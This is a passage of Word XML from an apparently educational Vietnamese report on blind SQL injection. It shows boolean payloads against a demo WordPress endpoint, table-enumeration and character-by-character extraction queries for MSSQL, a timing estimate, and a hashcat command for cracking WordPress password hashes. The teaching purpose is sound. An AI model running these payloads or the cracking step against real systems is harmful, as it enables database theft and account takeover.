      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2067AD51" w14:textId="2C930EA0" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="003D1F1A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidR="003D1F1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Toc42895605"/>
      <w:r w:rsidRPr="003D1F1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.Dạng Content-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="4470B931" w14:textId="6E971E18" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="003D1F1A" w:rsidP="003D1F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidR="00306DEE">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:t>Ở dạng này, hacker sẽ thử quan sát hành vi của hệ thống bằng việc truyền vào các câu lệnh SQL ở dạng TRUE or FALSE, đầu vào là những nơi nhận user-input mà dữ liệu này sau đó được tham gia vào việc truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D4D8A" w14:textId="77777777" w:rsidR="00306DEE" w:rsidRDefault="00FC5CBE" w:rsidP="003D1F1A">
      <w:r w:rsidRPr="00FC5CBE">
        <w:t xml:space="preserve">Ex: Ta có đầu vào là user-input là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D728E" w14:textId="59034166" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00A05C5B" w:rsidP="003D1F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00306DEE" w:rsidRPr="00D149E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EA07EAF" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00FC5CBE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E28FC42" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00306DEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:t>Tiếp theo là truyền vào truy vấn dạng TRUE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25622D0C" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00FC5CBE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4266DA42" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="003D1F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00FC5CBE">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?user=1 AND 1=1 ‘--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFF8F4" w14:textId="5E4658AF" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00306DEE" w:rsidP="00306DEE">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">      H</w:t>
      </w:r>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>acker sẽ quan sát trạng thái của hệ thống khi xử lý câu lệnh dạng TRUE thông qua các phản hồi trên trang web or trên thanh HTTP status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EA6D3" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="003D1F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tương tự với câu lệnh FALSE!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA29BA1" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00A05C5B" w:rsidP="003D1F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?user=1 AND 1=0 ‘--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B396B6B" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00FC5CBE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CA17D3" w14:textId="2D43D2B4" w:rsidR="00FC5CBE" w:rsidRDefault="00306DEE" w:rsidP="00ED42F8">
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00ED42F8">
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:t>Và khi có được các quy tắc chuẩn, hacker sẽ thay thế các lệnh TRUE/ FALSE luôn đúng/ sai</w:t>
      </w:r>
      <w:r w:rsidR="00ED42F8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:t>bằng các thông tin cần được khai thác liên quan đến cơ sở dữ liệu, thông tin người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9304BF" w14:textId="77777777" w:rsidR="00ED42F8" w:rsidRPr="00FC5CBE" w:rsidRDefault="00ED42F8" w:rsidP="00ED42F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2900AA6F" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00ED42F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:t xml:space="preserve">Ex:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00FC5CBE">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC5CBE">
        <w:t>?userId=1 AND length(database()) =10 ‘--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19972152" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00ED42F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:t>Ở trường hợp này: hacker đang dò kiểm tra liệu cơ sở dữ có 10 ký tự hay không, dựa theo các quy tắc đã xây dựng ở trên. Tiếp tục xây dựng cho đến khi thu được đầu ra mong muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5F4B8" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00FC5CBE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EA1DF1" w14:textId="1D3AAE8F" w:rsidR="00FC5CBE" w:rsidRPr="00676D4D" w:rsidRDefault="00FC5CBE" w:rsidP="00676D4D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r w:rsidR="00ED42F8">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:bookmarkStart w:id="17" w:name="_Toc42895606"/>
      <w:r w:rsidRPr="00676D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Time-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="3D8BA45B" w14:textId="221DBD32" w:rsidR="00FC5CBE" w:rsidRDefault="00676D4D" w:rsidP="00676D4D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:t>Dạng này khác Content-Based ở điểm, thay vì quan sát hành vi hệ thống, hacker sẽ gửi các câu lệnh điều kiện và các lệnh chờ đợi tương ứng, yêu cầu hệ thống phải chờ đợi 1 khoảng thời gian nếu câu lệnh TRUE or FALSE, từ đó cũng thu được kết quả y như trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EFF097" w14:textId="34EDD15C" w:rsidR="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="00676D4D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643E2671" w14:textId="39FF0422" w:rsidR="00676D4D" w:rsidRPr="0085333C" w:rsidRDefault="0085333C" w:rsidP="0085333C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:bookmarkStart w:id="18" w:name="_Toc42895607"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2.3.Cách khai thác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="3F5598C3" w14:textId="28C4ED55" w:rsidR="00676D4D" w:rsidRPr="0085333C" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidR="0085333C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_Toc42895608"/>
      <w:r w:rsidRPr="0085333C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Content-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="51D25744" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="00676D4D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6AB129" w14:textId="43720ED6" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="0085333C" w:rsidP="0085333C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:t>Sau khi xác định được đầu vào, và các tập quy tắc TRUE/FALSE. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B231F" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>Ta có thể liệt kê các bảng qua câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F4311" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()).  </w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t>Trong đó information_schema là bảng quản lý các cơ sở dữ liệu,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C9EBE" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>table_schema=database() ứng với database hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42C85E" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400DCD30" w14:textId="2AC9461E" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00404F57" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:t>Hacker có thể xác định thông tin từ bảng USER thông qua các phép lặp(do bảng USER có thể có thông tin của Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C857AD5" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C639C2" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2B565" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="0085333C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;78--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15CF6F" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="00404F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Trong câu lệnh trên, hacker sử dụng:  + </w:t>
      </w:r>
      <w:r w:rsidRPr="00404F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hàm ASCII()</w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> để chuyển ký tự về dạng số trong bảng mã</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C3DD2C" w14:textId="0693B4E9" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="00404F57">
      <w:r w:rsidRPr="00404F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hàm</w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00404F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>substring</w:t>
      </w:r>
      <w:r w:rsidR="00404F57">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> để cắt chuỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08A09A" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="00404F57">
      <w:r w:rsidRPr="00676D4D">
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00404F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isNull</w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> tạo ra một hành động thay thế để khi giá trị bên trong = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905EF96" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="00404F57">
      <w:r w:rsidRPr="00404F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sysObjects</w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> là bảng chứa thông tin về các database(các bảng do người dùng định nghĩa, các kiểu dữ liệu, các lược đồ, các ràng buộc...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C554CF" w14:textId="6B8FF11C" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="00404F57">
      <w:r w:rsidRPr="00404F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xtYpe</w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> là thuộc tính trong bảng sysObjects trong trường hợp này là 0x55=’U’ ứng với bảng người dùng</w:t>
      </w:r>
      <w:r w:rsidR="00404F57">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0CA768" w14:textId="467F3FEF" w:rsidR="004F6319" w:rsidRPr="004F6319" w:rsidRDefault="004F6319" w:rsidP="004F6319">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:t>Hacker muốn kiểm tra xem ký tự đầu tiên ở bảng người dùng ở dạng mã ASCII có bằng 78 hay không(78 -&gt; ký tự N), nếu là TRUE thì ta có ký tự đầu tiên là N, nếu trả về FALSE thì sẽ tiếp tục kiểm tra với ascii code giảm dần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44100310" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>Có được ký tự đầu tiên sẽ tiếp tục với ký tự thứ 2,3,...N;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35524711" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307D313E" w14:textId="455E4979" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="004F6319" w:rsidP="004F6319">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:t>Để tối ưu quá trình tìm kiếm hacker thường kết hợp với tìm kiếm nhị phân: Với tập đầu vào là các ký tự alphabet, number và một vài ký tự như ‘-’, ‘_’, ‘:’ … vào khoảng 40 ký tự, sẽ mất log2(40) = 6 lần thử, Giả sử  với password có 8 ký tự thì số lần thử là 48 lần, trung bình mỗi lần thực hiện trong 10s thì quá trình giải mã sẽ mất khoảng 6 phút phụ thuộc vào độ phức tạp hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6D7BD" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461F3AB0" w14:textId="29028CEA" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="004F6319" w:rsidP="004F6319">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:t xml:space="preserve">Đặc biệt: nếu password ở dạng Hash thì ta có thể dùng công cụ giải mã: Có thể sử dụng HashCat 64 với lệnh sau: hashcat 64 </w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> 400 </w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidR="00676D4D" w:rsidRPr="00676D4D">
        <w:t xml:space="preserve"> 0 hash.txt wordlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B414A" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>Trong đó -m 400 ứng với hashtype của WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA47512" w14:textId="1CD350DD" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
